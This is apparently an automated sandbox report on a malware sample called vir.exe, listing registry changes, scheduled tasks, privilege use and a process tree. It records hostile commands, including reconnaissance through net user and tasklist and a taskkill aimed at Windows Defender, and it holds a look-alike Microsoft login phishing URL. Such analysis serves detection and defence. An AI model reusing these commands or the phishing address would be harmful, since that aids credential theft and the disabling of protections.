"Kokila" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\36\IEFixedFontName = "Myanmar Text" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\15\IEFixedFontName = "Vijaya" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\31\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEFixedFontName = "Courier New" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\19\IEFixedFontName = "Cordia New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\26\IEPropFontName = "Simsun" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\30\IEFixedFontName = "Microsoft Yi Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9 reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20 reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 reg.exe -
Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\psiphon 3.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\psiphon\ = "URL:psiphon" 3.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\psiphon\shell\open\command 3.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\psiphon\shell\open 3.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\psiphon\URL Protocol 3.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\psiphon\shell 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\\bloatware\\3.exe\" -- \"%1\"" 3.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings OpenWith.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 17 IoCs
pid Process 4720 PING.EXE 6212 PING.EXE 6284 PING.EXE 6868 PING.EXE 2124 PING.EXE 2972 PING.EXE 1452 PING.EXE 2708 PING.EXE 7104 PING.EXE 5192 PING.EXE 1168 PING.EXE 2992 PING.EXE 2344 PING.EXE 7136 PING.EXE 248 PING.EXE 6760 PING.EXE 1720 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6528 schtasks.exe 5072 schtasks.exe 5292 schtasks.exe 5092 schtasks.exe 4264 schtasks.exe 7160 schtasks.exe 2320 schtasks.exe 4448 schtasks.exe 4360 schtasks.exe 6648 schtasks.exe 6640 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1696 vlc.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 2308 tasklist.exe 2308 tasklist.exe 5468 msedge.exe 5468 msedge.exe 1976 msedge.exe 1976 msedge.exe 1220 msedge.exe 1220 msedge.exe 484 msedge.exe 484 msedge.exe 1916 WinaeroTweaker-1.40.0.0-setup.tmp 1916 WinaeroTweaker-1.40.0.0-setup.tmp 2364 identity_helper.exe 2364 identity_helper.exe 5452 Umbral.exe 5452 Umbral.exe 6452 powershell.exe 6452 powershell.exe 6452 powershell.exe 3004 powershell.exe 3004 powershell.exe 3004 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 7020 powershell.exe 7020 powershell.exe 7020 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 2700 msedge.exe 2700 msedge.exe 2700 msedge.exe 2700 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3276 OpenWith.exe 2104 ac3.exe 1696 vlc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2308 tasklist.exe Token: SeDebugPrivilege 5868 taskkill.exe Token: SeDebugPrivilege 3908 Rover.exe Token: SeDebugPrivilege 1668 taskkill.exe Token: SeDebugPrivilege 5388 taskkill.exe Token: SeDebugPrivilege 2504 taskkill.exe Token: SeDebugPrivilege 1604 scary.exe Token: SeDebugPrivilege 4696 Romilyaa.exe Token: SeDebugPrivilege 1624 Romilyaa.exe Token: SeDebugPrivilege 1472 firefox.exe Token: SeDebugPrivilege 1472 firefox.exe Token: SeDebugPrivilege 1580 Romilyaa.exe Token: SeDebugPrivilege 6468 Romilyaa.exe Token: SeDebugPrivilege 4828 taskkill.exe Token: SeDebugPrivilege 7032 SolaraBootstrapper.exe Token: SeDebugPrivilege 5452 Umbral.exe Token: SeIncreaseQuotaPrivilege 6932 wmic.exe Token: SeSecurityPrivilege 6932 wmic.exe Token: SeTakeOwnershipPrivilege 6932 wmic.exe Token: SeLoadDriverPrivilege 6932 wmic.exe Token: SeSystemProfilePrivilege 6932 wmic.exe Token: SeSystemtimePrivilege 6932 wmic.exe Token: SeProfSingleProcessPrivilege 6932 wmic.exe Token: SeIncBasePriorityPrivilege 6932 wmic.exe Token: SeCreatePagefilePrivilege 6932 wmic.exe Token: SeBackupPrivilege 6932 wmic.exe Token: SeRestorePrivilege 6932 wmic.exe Token: SeShutdownPrivilege 6932 wmic.exe Token: SeDebugPrivilege 6932 wmic.exe Token: SeSystemEnvironmentPrivilege 6932 wmic.exe Token: SeRemoteShutdownPrivilege 6932 wmic.exe Token: SeUndockPrivilege 6932 wmic.exe Token: SeManageVolumePrivilege 6932 wmic.exe Token: 33 6932 wmic.exe Token: 34 6932 wmic.exe Token: 35 6932 wmic.exe Token: 36 6932 wmic.exe Token: SeIncreaseQuotaPrivilege 6932 wmic.exe Token: SeSecurityPrivilege 6932 wmic.exe Token: SeTakeOwnershipPrivilege 6932 wmic.exe Token: SeLoadDriverPrivilege 6932 wmic.exe Token: SeSystemProfilePrivilege 6932 wmic.exe Token: SeSystemtimePrivilege 6932 wmic.exe Token: SeProfSingleProcessPrivilege 6932 wmic.exe Token: SeIncBasePriorityPrivilege 6932 wmic.exe Token: SeCreatePagefilePrivilege 6932 wmic.exe Token: SeBackupPrivilege 6932 wmic.exe Token: SeRestorePrivilege 6932 wmic.exe Token: SeShutdownPrivilege 6932 wmic.exe Token: SeDebugPrivilege 6932 wmic.exe Token: SeSystemEnvironmentPrivilege 6932 wmic.exe Token: SeRemoteShutdownPrivilege 6932 wmic.exe Token: SeUndockPrivilege 6932 wmic.exe Token: SeManageVolumePrivilege 6932 wmic.exe Token: 33 6932 wmic.exe Token: 34 6932 wmic.exe Token: 35 6932 wmic.exe Token: 36 6932 wmic.exe Token: 33 6420 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 6420 AUDIODG.EXE Token: 33 1696 vlc.exe Token: SeIncBasePriorityPrivilege 1696 vlc.exe Token: SeDebugPrivilege 6452 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1928 efsui.exe 1928 efsui.exe 1928 efsui.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1916 WinaeroTweaker-1.40.0.0-setup.tmp 4696 Romilyaa.exe 1624 Romilyaa.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1472 firefox.exe 1580 Romilyaa.exe 6468 Romilyaa.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe -
Suspicious use of SendNotifyMessage 33 IoCs
pid Process 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1928 efsui.exe 1928 efsui.exe 1928 efsui.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 4696 Romilyaa.exe 1624 Romilyaa.exe 1580 Romilyaa.exe 6468 Romilyaa.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 2308 Romilyaa.exe 6204 Romilyaa.exe 1800 Romilyaa.exe 2776 Romilyaa.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 6844 Romilyaa.exe 2932 Romilyaa.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
pid Process 1960 3.exe 1960 3.exe 3276 OpenWith.exe 3276 OpenWith.exe 3276 OpenWith.exe 3276 OpenWith.exe 3276 OpenWith.exe 1472 firefox.exe 6672 OpenWith.exe 1696 vlc.exe 6368 OpenWith.exe 1696 vlc.exe 1696 vlc.exe 1696 vlc.exe 4704 OpenWith.exe 2776 Romilyaa.exe 6844 Romilyaa.exe 2932 Romilyaa.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2688 wrote to memory of 3288 2688 vir.exe 82 PID 2688 wrote to memory of 3288 2688 vir.exe 82 PID 2688 wrote to memory of 3288 2688 vir.exe 82 PID 2688 wrote to memory of 5520 2688 vir.exe 83 PID 2688 wrote to memory of 5520 2688 vir.exe 83 PID 2688 wrote to memory of 5520 2688 vir.exe 83 PID 5520 wrote to memory of 1364 5520 cmd.exe 85 PID 5520 wrote to memory of 1364 5520 cmd.exe 85 PID 5520 wrote to memory of 1364 5520 cmd.exe 85 PID 5520 wrote to memory of 4400 5520 cmd.exe 87 PID 5520 wrote to memory of 4400 5520 cmd.exe 87 PID 5520 wrote to memory of 4400 5520 cmd.exe 87 PID 5520 wrote to memory of 248 5520 cmd.exe 89 PID 5520 wrote to memory of 248 5520 cmd.exe 89 PID 5520 wrote to memory of 248 5520 cmd.exe 89 PID 1364 wrote to memory of 5540 1364 cmd.exe 90 PID 1364 wrote to memory of 5540 1364 cmd.exe 90 PID 1364 wrote to memory of 5540 1364 cmd.exe 90 PID 4400 wrote to memory of 668 4400 cmd.exe 91 PID 4400 wrote to memory of 668 4400 cmd.exe 91 PID 4400 wrote to memory of 668 4400 cmd.exe 91 PID 1364 wrote to memory of 4056 1364 cmd.exe 92 PID 1364 wrote to memory of 4056 1364 cmd.exe 92 PID 1364 wrote to memory of 4056 1364 cmd.exe 92 PID 4400 wrote to memory of 5268 4400 cmd.exe 93 PID 4400 wrote to memory of 5268 4400 cmd.exe 93 PID 4400 wrote to memory of 5268 4400 cmd.exe 93 PID 5268 wrote to memory of 5516 5268 net.exe 94 PID 5268 wrote to memory of 5516 5268 net.exe 94 PID 5268 wrote to memory of 5516 5268 net.exe 94 PID 1364 wrote to memory of 5264 1364 cmd.exe 95 PID 1364 wrote to memory of 5264 1364 cmd.exe 95 PID 1364 wrote to memory of 5264 1364 cmd.exe 95 PID 4400 wrote to memory of 3904 4400 cmd.exe 96 PID 4400 wrote to memory of 3904 4400 cmd.exe 96 PID 4400 wrote to memory of 3904 4400 cmd.exe 96 PID 3904 wrote to memory of 5512 3904 net.exe 97 PID 3904 wrote to memory of 5512 3904 net.exe 97 PID 3904 wrote to memory of 5512 3904 net.exe 97 PID 4400 wrote to memory of 2308 4400 cmd.exe 98 PID 4400 wrote to memory of 2308 4400 cmd.exe 98 PID 4400 wrote to memory of 2308 4400 cmd.exe 98 PID 5520 wrote to memory of 5868 5520 cmd.exe 101 PID 5520 wrote to memory of 5868 5520 cmd.exe 101 PID 5520 wrote to memory of 5868 5520 cmd.exe 101 PID 5520 wrote to memory of 4288 5520 cmd.exe 102 PID 5520 wrote to memory of 4288 5520 cmd.exe 102 PID 5520 wrote to memory of 4288 5520 cmd.exe 102 PID 5520 wrote to memory of 1976 5520 cmd.exe 104 PID 5520 wrote to memory of 1976 5520 cmd.exe 104 PID 5520 wrote to memory of 460 5520 cmd.exe 105 PID 5520 wrote to memory of 460 5520 cmd.exe 105 PID 5520 wrote to memory of 460 5520 cmd.exe 105 PID 1976 wrote to memory of 1020 1976 msedge.exe 106 PID 1976 wrote to memory of 1020 1976 msedge.exe 106 PID 5520 wrote to memory of 3908 5520 cmd.exe 107 PID 5520 wrote to memory of 3908 5520 cmd.exe 107 PID 5520 wrote to memory of 3908 5520 cmd.exe 107 PID 5520 wrote to memory of 2652 5520 cmd.exe 109 PID 5520 wrote to memory of 2652 5520 cmd.exe 109 PID 2652 wrote to memory of 6104 2652 msedge.exe 112 PID 2652 wrote to memory of 6104 2652 msedge.exe 112 PID 460 wrote to memory of 4352 460 cmd.exe 114 PID 460 wrote to memory of 4352 460 cmd.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3776 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exe"C:\Users\Admin\AppData\Local\Temp\vir.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Admin\AppData\Local\Temp\845fee61-2dc2-4d73-9ef8-d72321dd56d6\ProgressBarSplash.exe"C:\Users\Admin\AppData\Local\Temp\845fee61-2dc2-4d73-9ef8-d72321dd56d6\ProgressBarSplash.exe" -unpacking2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\!main.cmd" "2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5540
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:4056
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:668
-
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5268 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵PID:5516
-
-
-
C:\Windows\SysWOW64\net.exenet user4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵
- System Location Discovery: System Language Discovery
PID:5512
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:248
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵
- System Location Discovery: System Language Discovery
PID:4288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ23⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff24b73cb8,0x7fff24b73cc8,0x7fff24b73cd84⤵PID:1020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:24⤵PID:4084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:84⤵PID:3940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:14⤵PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:14⤵PID:2836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:14⤵PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5764 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:14⤵PID:4324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:14⤵PID:4628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:14⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:14⤵PID:5260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4516 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:14⤵PID:6816
-
-
